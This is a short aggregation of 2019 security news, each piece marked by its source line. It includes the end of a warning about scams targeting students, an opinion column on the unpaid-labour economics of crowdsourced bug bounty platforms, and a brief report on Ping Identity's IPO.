Nor do they demand money over VoIP calls. If you or someone you know starts getting messages from people claiming to be investigators, tell your university staff or even contact the police yourself through non-emergency means to verify the messages. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/19/student_visa_brexit_fears_scam/

Crowdsourced Security & the Gig Economy

Crowdsourced platforms have redefined both pentesting and the cybersecurity gig economy. Just not in a good way.

Let’s pretend you have offensive security skills and you want to use them for gainful employment. You attend a job interview and you listen to the benefits of what this company has to offer. First of all, most of the time you’ll be working for free — unless you find a vulnerability, and then they might pay you a few weeks later. You’ll also receive no paid sick days, paid holidays, or days off of any kind because, well, you’re working for free remember?

The tools you’ll need for this job — laptops, mobile devices, and any other widgets — you’ll have to provide yourself. As for a pension… of course not. No subsidized gym memberships, health insurance, discount vouchers, free breakfasts, or free food of any kind.

This is the reality for thousands of individuals who work on bug bounty programs for various crowdsourced security companies. And it’s hard to find a comparison with other companies in the current gig economy (such as Uber, Airbnb, and Deliveroo), where employees work their own hours and forgo traditional employee benefits (holidays, pensions, etc.) as a trade-off. The one crucial difference: Gig economy workers are actually paid for their labor and can predict their income if they choose to invest two hours or two days a week.

Let me elaborate. You’ll only be paid on bug bounties if you find vulnerabilities. To find vulnerabilities, you have to invest your time. Sometimes, you might be lucky and find critical, high-paying vulnerabilities in minutes; I was once lucky enough to find $6,000 of vulnerabilities in 30 minutes — not a bad hourly rate. But these findings are the exception, not the norm. Most of the time, you don’t find any vulnerabilities at all. That’s hard to reconcile if you’ve spent six or seven hours trawling through an application and come up empty-handed — you get nothing for your time. Worse, you might actually find a vulnerability but have it classed as a “duplicate,” meaning someone else found it before you, and you still get nothing.

You see, pen testers (or anyone with an offensive security skill set) are hard to find on the job market because, yes, there’s a shortage and, yes, it’s getting worse. Once you recruit them, you have to pay them top dollar so they stay, and you also have to keep them happy by sending them to conferences and allowing them time to do their own research and attend certification courses (for which you’ll also pay). On top of that, you have to pay them traditional benefits such as a pension, a regular salary, etc. And since you’re sending them to various customer sites, you obviously need to pay for transportation expenses. While you employ them, you also have to make the best use of them, billing them out at $1,000 a day (or more!) so you can make some money off them. Not having them working on client engagements is very expensive because they’re sitting around doing nothing.

Crowdsourced companies have leapfrogged these complications in spectacular fashion by removing them from the equation entirely. Your “employees” can be anywhere in the world, and as long as they are given an incentive to participate in bounties — even if they aren’t paid unless they find something — you’ve just made your business leaner. You don’t need to pay for their certifications, tools, upkeep, pensions, or any of the costs associated with full-time employees. You pay per vulnerability, so it’s irrelevant how many researchers participate. There’s no office space to contend with, and no need to even review their performance, because it’s a self-fulfilling cycle: those who perform better get paid more, so they are invited to more bounties, get paid even more, and so the cycle continues.

A Nice Job if You Can Get It
But who would actually sign up for this? Thousands, in fact. First of all, there aren’t that many people working in this fashion. Forget the marketing statistics you hear — crowdsourced companies may claim anywhere from 150,000 to 300,000 people on their platform, but all they’re doing is counting the number of sign-ups. When you drill down into the statistics, only a tiny percentage of those people have ever logged a vulnerability.

Most people on these platforms (such as myself), according to Bugcrowd’s “2019 Inside the Mind of a Hacker” report, don’t do it full time, especially if they live in Europe or the US. Salaries in the cybersecurity sector are high enough that most people don’t have to moonlight for extra money, which is why, without exception, all the researchers I speak to do it for fun, the challenge, or just the safety net of being able to hunt for bugs in applications without the threat of legal action.

To be fair, crowdsourced companies are acutely aware of this criticism and are slowly trying to address it. Synack launched Missions a year ago: short, focused tests for a single vulnerability in which you get paid whether you find the vulnerability or not. Bugcrowd has also launched its Next Gen Pen Test, which follows a similar vein: if you work through a testing methodology but don’t find anything, you get a lump sum; if you find vulnerabilities, you get paid for those, too.

Work Still Needed
Arguably, companies in the industry still have a lot of work to do. While they have teams internally dedicated to “researcher success,” these are customer-focused. I’ve lost count of the number of times I’ve had a company not pay out (whether out of ignorance or on purpose), ignore a vulnerability, or simply misclassify the severity of something I found in order to pay less. The one exception is Synack, which has solved this issue with a slightly different business model: it consistently pays out from its own funds and negotiates with companies separately. This is also why it has the reputation for the fastest payouts in the crowdsourced industry. Based on my personal experience, you can often see money in the bank 48 hours after submitting a vulnerability.

It’s hard to see this continuing into the future — bug bounties and disclosure platforms aren’t new anymore, and it’s telling that the researchers you find on one platform are identical to those on the others because, simply put, everyone with a desire to participate in bug bounties already does. There is no never-ending stream of new researchers to pull from. This is problematic because the entire business model depends on two things: a continuous stream of people looking for vulnerabilities, and having those people work mostly for free.

As a result, platforms have had to switch tactics. Cycling researchers is common. For example, if you have 30 researchers assigned to a private bounty program, and 20 of those haven’t logged a single vulnerability in a few months, it’s fair to say they aren’t looking anyway, so you cycle them out and invite 20 new people in to replace them. This is to generate that constant flow of researchers with a different set of eyeballs that might spot something the others haven’t. (This is one of the primary advantages of crowdsourced security over pen testing, so it makes complete sense).

The other technique is gamification. Payments are increased for certain companies, and this is communicated out to everyone to rekindle interest with the introduction of badges, achievements, T-shirts, and all sorts of goodies as rewards for meeting certain targets or types of vulnerabilities. Techniques like this will work in the short term but will eventually come up against the same long-term boundaries because there just isn’t an infinite supply of highly skilled specialist labor that works for free.



Article source: https://www.darkreading.com/risk-management/crowdsourced-security-and-the-gig-economy/a/d-id/1335800?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Ping Identity Prices IPO at $15 per Share

The identity management company plans to sell 12.5 million shares, raising $187.5 million in its initial public offering.

Identity management company Ping Identity today announced its initial public offering of 12.5 million shares of common stock at a public price of $15 per share, raising $187.5 million in its IPO. The firm is scheduled to start trading on the NYSE today under the ticker symbol “PING.”

Denver-based Ping Identity was founded in 2002; since then, it has raised $128.3 million over nine rounds of funding. The organization was acquired in 2016 by Vista Equity Partners for $600 million, CrunchBase reports. With shares priced this week at $15 each, Ping Identity is now valued at around $1.16 billion — nearly double what Vista Equity paid for it.

Lead book-running managers for the proposed offering include Goldman Sachs, Bank of America Merrill Lynch, RBC Capital Markets, and Citigroup. Ping Identity has granted underwriters a 30-day option to buy up to 1.87 million additional shares of common stock.

The offering is expected to close on September 23, 2019, subject to customary closing conditions.




Article source: https://www.darkreading.com/cloud/ping-identity-prices-ipo-at-$15-per-share/d/d-id/1335858?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple